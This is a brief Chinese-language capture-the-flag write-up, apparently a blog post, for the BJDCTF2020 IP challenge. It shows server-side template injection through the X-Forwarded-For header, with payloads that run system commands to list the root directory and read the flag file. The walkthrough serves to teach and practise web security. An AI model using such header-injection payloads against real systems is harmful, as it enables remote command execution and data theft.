打开题目
发现一个flag标签打开
看到了页面获取了本机的ip,看到ip就想到了X-Forwarded-For:
抓取flag页面,添加X-Forwarded-For:
构造payload,系统命令查看根目录下的所有文件,第一次发现还可以这么玩
X-Forwarded-For:{system("ls /")}
发现敏感文件flag
尝试获取
X-Forwarded-For:{system("cat /flag")}
得到flag
标签:mystery,Forwarded,ip,system,flag,BJDCTF2020 From: https://www.cnblogs.com/mu-yi2/p/16818460.html